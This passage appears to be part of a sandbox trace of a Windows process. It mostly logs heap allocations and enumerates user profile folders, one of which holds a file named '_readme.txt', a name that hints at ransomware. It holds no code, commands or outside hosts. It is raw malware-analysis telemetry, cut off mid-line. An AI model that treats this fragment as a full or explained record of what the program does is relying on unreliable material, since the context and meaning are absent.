Size=0x50) returned 0x322f5d8 [0146.865] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322eef8 [0146.865] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0146.865] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f528 [0146.865] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f5d8 [0146.865] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f210 [0146.865] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0146.865] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x60) returned 0x7bbe38 [0146.865] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x60) returned 0x3a641a0 [0146.865] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x310) returned 0x32426a8 [0146.865] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f528 [0146.865] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x60) returned 0x3a640d0 [0146.865] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f5d8 [0146.865] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f630 [0146.865] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f000 [0146.865] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x60) returned 0x3a64068 [0146.865] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x60) returned 0x3a642d8 [0146.865] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x60) returned 0x3a64340 [0146.866] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f160 [0146.866] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x60) returned 0x3a643a8 [0146.866] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f478 [0146.866] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x60) returned 0x3a64410 [0146.866] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f420 [0146.866] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f3c8 [0146.866] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x60) returned 0x3a64478 [0146.866] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f370 [0146.866] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x60) returned 0x3a644e0 [0146.866] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f318 [0146.866] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322ef50 [0146.866] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0146.866] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f210 [0146.866] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x76) returned 0x740aa8 [0146.866] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x208bab90, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x208bab90, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0146.866] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f210 [0146.866] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322eef8 [0146.866] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f580 [0146.866] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ece8a70, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ece8a70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ece8a70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0146.866] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x74d300 [0146.866] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x60) returned 0x7bbe38 [0146.866] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt") returned=".txt" [0146.866] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ece8a70, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ece8a70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ece8a70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0146.866] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.866] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0146.866] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e778 [0146.866] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.866] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e7b0 [0146.866] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.866] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.867] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e7b0 | out: hHeap=0x6e0000) returned 1 [0146.867] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e7b0 [0146.867] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.867] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.867] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e7b0 | out: hHeap=0x6e0000) returned 1 [0146.867] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e7b0 [0146.867] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.867] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.867] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e7b0 | out: hHeap=0x6e0000) returned 1 [0146.867] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e7b0 [0146.867] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.867] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.867] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e7b0 | out: hHeap=0x6e0000) returned 1 [0146.867] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e778 | out: hHeap=0x6e0000) returned 1 [0146.867] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0146.867] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e778 [0146.867] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.867] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e7b0 [0146.867] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.867] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.867] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e7b0 | out: hHeap=0x6e0000) returned 1 [0146.867] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e7b0 [0146.867] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.867] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.867] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e7b0 | out: hHeap=0x6e0000) returned 1 [0146.867] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e7b0 [0146.867] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.867] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.867] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e7b0 | out: hHeap=0x6e0000) returned 1 [0146.867] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e7b0 [0146.867] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.867] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.867] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e7b0 | out: hHeap=0x6e0000) returned 1 [0146.867] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e7b0 [0146.867] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.867] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.868] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e7b0 | out: hHeap=0x6e0000) returned 1 [0146.868] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e778 | out: hHeap=0x6e0000) returned 1 [0146.868] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0146.868] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e778 [0146.868] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.868] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e7b0 [0146.868] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.868] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.868] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e7b0 | out: hHeap=0x6e0000) returned 1 [0146.868] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e7b0 [0146.868] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.868] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.868] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e7b0 | out: hHeap=0x6e0000) returned 1 [0146.868] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e778 | out: hHeap=0x6e0000) returned 1 [0146.868] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0146.868] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e778 [0146.868] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.868] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e7b0 [0146.868] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.868] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.868] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e7b0 | out: hHeap=0x6e0000) returned 1 [0146.868] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e7b0 [0146.868] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.868] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.868] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e7b0 | out: hHeap=0x6e0000) returned 1 [0146.868] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e7b0 [0146.868] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.868] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.868] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e7b0 | out: hHeap=0x6e0000) returned 1 [0146.868] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e778 | out: hHeap=0x6e0000) returned 1 [0146.868] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0146.868] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240780 | out: hHeap=0x6e0000) returned 1 [0146.868] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240bb8 | out: hHeap=0x6e0000) returned 1 [0146.868] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240af0 | out: hHeap=0x6e0000) returned 1 [0146.868] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.868] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b90 | out: hHeap=0x6e0000) returned 1 [0146.868] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240938 | out: hHeap=0x6e0000) returned 1 [0146.869] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240988 | out: hHeap=0x6e0000) returned 1 [0146.869] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240aa0 | out: hHeap=0x6e0000) returned 1 [0146.869] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240dc0 | out: hHeap=0x6e0000) returned 1 [0146.869] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240de8 | out: hHeap=0x6e0000) returned 1 [0146.869] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240c30 | out: hHeap=0x6e0000) returned 1 [0146.869] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cf8 | out: hHeap=0x6e0000) returned 1 [0146.869] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240d48 | out: hHeap=0x6e0000) returned 1 [0146.869] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a00 | out: hHeap=0x6e0000) returned 1 [0146.869] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32409d8 | out: hHeap=0x6e0000) returned 1 [0146.869] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32409b0 | out: hHeap=0x6e0000) returned 1 [0146.869] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3a651f8 | out: hHeap=0x6e0000) returned 1 [0146.869] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3a65220 | out: hHeap=0x6e0000) returned 1 [0146.869] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3a65248 | out: hHeap=0x6e0000) returned 1 [0146.869] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3a65270 | out: hHeap=0x6e0000) returned 1 [0146.869] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3a65298 | out: hHeap=0x6e0000) returned 1 [0146.869] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3a652c0 | out: hHeap=0x6e0000) returned 1 [0146.869] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3a652e8 | out: hHeap=0x6e0000) returned 1 [0146.869] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3a65310 | out: hHeap=0x6e0000) returned 1 [0146.869] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6b98 | out: hHeap=0x6e0000) returned 1 [0146.869] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e5f0 | out: hHeap=0x6e0000) returned 1 [0146.869] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e708 | out: hHeap=0x6e0000) returned 1 [0146.869] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e5b8 | out: hHeap=0x6e0000) returned 1 [0146.869] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e6d0 | out: hHeap=0x6e0000) returned 1 [0146.869] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3219ec8 | out: hHeap=0x6e0000) returned 1 [0146.869] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f210 [0146.869] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.869] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322eef8 [0146.869] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.869] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.869] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322eef8 | out: hHeap=0x6e0000) returned 1 [0146.869] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322eef8 [0146.869] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.869] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.869] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322eef8 | out: hHeap=0x6e0000) returned 1 [0146.869] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322eef8 [0146.869] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.869] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.870] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322eef8 | out: hHeap=0x6e0000) returned 1 [0146.870] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322eef8 [0146.870] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.870] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.870] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322eef8 | out: hHeap=0x6e0000) returned 1 [0146.870] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322eef8 [0146.870] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.870] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.870] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322eef8 | out: hHeap=0x6e0000) returned 1 [0146.870] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322eef8 [0146.870] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.870] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.870] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322eef8 | out: hHeap=0x6e0000) returned 1 [0146.870] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322eef8 [0146.870] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.870] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.870] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.870] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.870] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322eef8 | out: hHeap=0x6e0000) returned 1 [0146.870] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322eef8 [0146.870] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.870] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.870] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322eef8 | out: hHeap=0x6e0000) returned 1 [0146.870] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322eef8 [0146.870] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.870] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.870] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322eef8 | out: hHeap=0x6e0000) returned 1 [0146.870] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322eef8 [0146.870] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.870] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.870] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322eef8 | out: hHeap=0x6e0000) returned 1 [0146.870] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322eef8 [0146.870] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.870] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.870] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322eef8 | out: hHeap=0x6e0000) returned 1 [0146.870] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322eef8 [0146.870] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.871] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.871] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322eef8 | out: hHeap=0x6e0000) returned 1 [0146.871] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322eef8 [0146.871] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.871] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.871] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322eef8 | out: hHeap=0x6e0000) returned 1 [0146.871] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322eef8 [0146.871] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.871] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.871] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322eef8 | out: hHeap=0x6e0000) returned 1 [0146.871] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322eef8 [0146.871] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.871] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.871] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322eef8 | out: hHeap=0x6e0000) returned 1 [0146.871] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322eef8 [0146.871] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.871] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) 